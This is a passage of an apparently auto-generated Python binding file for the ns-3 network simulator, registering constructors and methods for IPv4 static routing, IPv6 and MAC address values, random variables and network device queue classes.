ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], is_pure_virtual=True, is_virtual=True) return def register_Ns3Ipv4StaticRouting_methods(root_module, cls): ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4StaticRouting::Ipv4StaticRouting(ns3::Ipv4StaticRouting const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4StaticRouting const &', 'arg0')]) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4StaticRouting::Ipv4StaticRouting() [constructor] cls.add_constructor([]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddHostRouteTo(ns3::Ipv4Address dest, ns3::Ipv4Address nextHop, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddHostRouteTo', 'void', [param('ns3::Ipv4Address', 'dest'), param('ns3::Ipv4Address', 'nextHop'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddHostRouteTo(ns3::Ipv4Address dest, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddHostRouteTo', 'void', [param('ns3::Ipv4Address', 'dest'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddMulticastRoute(ns3::Ipv4Address origin, ns3::Ipv4Address group, uint32_t inputInterface, std::vector<unsigned int, std::allocator<unsigned int> > outputInterfaces) [member function] cls.add_method('AddMulticastRoute', 'void', [param('ns3::Ipv4Address', 'origin'), param('ns3::Ipv4Address', 'group'), param('uint32_t', 'inputInterface'), param('std::vector< unsigned int >', 'outputInterfaces')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddNetworkRouteTo(ns3::Ipv4Address network, ns3::Ipv4Mask networkMask, ns3::Ipv4Address nextHop, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddNetworkRouteTo', 'void', [param('ns3::Ipv4Address', 'network'), param('ns3::Ipv4Mask', 'networkMask'), param('ns3::Ipv4Address', 'nextHop'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::AddNetworkRouteTo(ns3::Ipv4Address network, ns3::Ipv4Mask networkMask, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('AddNetworkRouteTo', 'void', [param('ns3::Ipv4Address', 'network'), param('ns3::Ipv4Mask', 'networkMask'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4RoutingTableEntry ns3::Ipv4StaticRouting::GetDefaultRoute() [member function] cls.add_method('GetDefaultRoute', 'ns3::Ipv4RoutingTableEntry', []) ## ipv4-static-routing.h (module 'internet'): uint32_t ns3::Ipv4StaticRouting::GetMetric(uint32_t index) const [member function] cls.add_method('GetMetric', 'uint32_t', [param('uint32_t', 'index')], is_const=True) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4MulticastRoutingTableEntry ns3::Ipv4StaticRouting::GetMulticastRoute(uint32_t i) const [member function] cls.add_method('GetMulticastRoute', 'ns3::Ipv4MulticastRoutingTableEntry', [param('uint32_t', 'i')], is_const=True) ## ipv4-static-routing.h (module 'internet'): uint32_t ns3::Ipv4StaticRouting::GetNMulticastRoutes() const [member function] cls.add_method('GetNMulticastRoutes', 'uint32_t', [], is_const=True) ## ipv4-static-routing.h (module 'internet'): uint32_t ns3::Ipv4StaticRouting::GetNRoutes() const [member function] cls.add_method('GetNRoutes', 'uint32_t', [], is_const=True) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4RoutingTableEntry ns3::Ipv4StaticRouting::GetRoute(uint32_t i) const [member function] cls.add_method('GetRoute', 'ns3::Ipv4RoutingTableEntry', [param('uint32_t', 'i')], is_const=True) ## ipv4-static-routing.h (module 'internet'): static ns3::TypeId ns3::Ipv4StaticRouting::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_const=True, is_virtual=True) ## ipv4-static-routing.h (module 'internet'): bool ns3::Ipv4StaticRouting::RemoveMulticastRoute(ns3::Ipv4Address origin, ns3::Ipv4Address group, uint32_t inputInterface) [member function] cls.add_method('RemoveMulticastRoute', 'bool', [param('ns3::Ipv4Address', 'origin'), param('ns3::Ipv4Address', 'group'), param('uint32_t', 'inputInterface')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::RemoveMulticastRoute(uint32_t index) [member function] cls.add_method('RemoveMulticastRoute', 'void', [param('uint32_t', 'index')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::RemoveRoute(uint32_t i) [member function] cls.add_method('RemoveRoute', 'void', [param('uint32_t', 'i')]) ## ipv4-static-routing.h (module 'internet'): bool ns3::Ipv4StaticRouting::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4StaticRouting::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::SetDefaultMulticastRoute(uint32_t outputInterface) [member function] cls.add_method('SetDefaultMulticastRoute', 'void', [param('uint32_t', 'outputInterface')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::SetDefaultRoute(ns3::Ipv4Address nextHop, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('SetDefaultRoute', 'void', [param('ns3::Ipv4Address', 'nextHop'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3Ipv6AddressChecker_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')]) return def register_Ns3Ipv6AddressValue_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'value')]) ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv6Address', [], is_const=True) ## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv6Address const &', 'value')]) return def register_Ns3Ipv6PrefixChecker_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')]) return def register_Ns3Ipv6PrefixValue_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')]) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor] cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')]) ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv6Prefix', [], is_const=True) ## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv6Prefix const &', 'value')]) return def register_Ns3LogNormalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function] cls.add_method('GetMu', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function] cls.add_method('GetSigma', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function] cls.add_method('GetValue', 'double', [param('double', 'mu'), param('double', 'sigma')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mu'), param('uint32_t', 'sigma')]) ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3Mac48AddressChecker_methods(root_module, cls): ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker() [constructor] cls.add_constructor([]) ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker(ns3::Mac48AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Mac48AddressChecker const &', 'arg0')]) return def register_Ns3Mac48AddressValue_methods(root_module, cls): ## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue() [constructor] cls.add_constructor([]) ## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Mac48AddressValue const &', 'arg0')]) ## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48Address const & value) [constructor] cls.add_constructor([param('ns3::Mac48Address const &', 'value')]) ## mac48-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Mac48AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## mac48-address.h (module 'network'): bool ns3::Mac48AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## mac48-address.h (module 'network'): ns3::Mac48Address ns3::Mac48AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Mac48Address', [], is_const=True) ## mac48-address.h (module 'network'): std::string ns3::Mac48AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## mac48-address.h (module 'network'): void ns3::Mac48AddressValue::Set(ns3::Mac48Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Mac48Address const &', 'value')]) return def register_Ns3NetDevice_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDevice const &', 'arg0')]) ## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function] cls.add_method('AddLinkChangeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function] cls.add_method('GetAddress', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function] cls.add_method('GetBroadcast', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function] cls.add_method('GetChannel', 'ns3::Ptr< ns3::Channel >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function] cls.add_method('GetIfIndex', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function] cls.add_method('GetMtu', 'uint16_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function] cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv4Address', 'multicastGroup')], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function] cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv6Address', 'addr')], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function] cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function] cls.add_method('IsBridge', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function] cls.add_method('IsLinkUp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function] cls.add_method('IsPointToPoint', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function] cls.add_method('NeedsArp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function] cls.add_method('Send', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function] cls.add_method('SendFrom', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function] cls.add_method('SetAddress', 'void', [param('ns3::Address', 'address')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function] cls.add_method('SetIfIndex', 'void', [param('uint32_t const', 'index')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function] cls.add_method('SetMtu', 'bool', [param('uint16_t const', 'mtu')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function] cls.add_method('SetPromiscReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function] cls.add_method('SetReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function] cls.add_method('SupportsSendFrom', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3NetDeviceQueue_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue(ns3::NetDeviceQueue const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDeviceQueue const &', 'arg0')]) ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): ns3::Ptr<ns3::QueueLimits> ns3::NetDeviceQueue::GetQueueLimits() [member function] cls.add_method('GetQueueLimits', 'ns3::Ptr< ns3::QueueLimits >', []) ## net-device.h (module 'network'): bool ns3::NetDeviceQueue::IsStopped() const [member function] cls.add_method('IsStopped', 'bool', [], is_const=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyQueuedBytes(uint32_t bytes) [member function] cls.add_method('NotifyQueuedBytes', 'void', [param('uint32_t', 'bytes')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyTransmittedBytes(uint32_t bytes) [member function] cls.add_method('NotifyTransmittedBytes', 'void', [param('uint32_t', 'bytes')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::ResetQueueLimits() [member function] cls.add_method('ResetQueueLimits', 'void', []) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetQueueLimits(ns3::Ptr<ns3::QueueLimits> ql) [member function] cls.add_method('SetQueueLimits', 'void', [param('ns3::Ptr< ns3::QueueLimits >', 'ql')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetWakeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function] cls.add_method('SetWakeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Start() [member function] cls.add_method('Start', 'void', [], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Stop() [member function] cls.add_method('Stop', 'void', [], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Wake() [member function] cls.add_method('Wake', 'void', [], is_virtual=True) return def register_Ns3NetDeviceQueueInterface_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface(ns3::NetDeviceQueueInterface const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDeviceQueueInterface const &', 'arg0')]) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::CreateTxQueues() [member function] cls.add_method('CreateTxQueues', 'void', []) ## net-device.h (module 'network'): uint8_t ns3::NetDeviceQueueInterface::GetNTxQueues() const [member function] cls.add_method('GetNTxQueues', 'uint8_t', [], is_const=True) ## net-device.h (module 'network'): ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::NetDeviceQueueInterface::GetSelectQueueCallback() const [member function] cls.add_method('GetSelectQueueCallback', 'ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::NetDeviceQueue> ns3::NetDeviceQueueInterface::GetTxQueue(uint8_t i) const [member function] cls.add_method('GetTxQueue', 'ns3::Ptr< ns3::NetDeviceQueue >', [param('uint8_t', 'i')], is_const=True) ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDeviceQueueInterface::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetSelectQueueCallback(ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function] cls.add_method('SetSelectQueueCallback', 'void', [param('ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetTxQueuesN(uint8_t 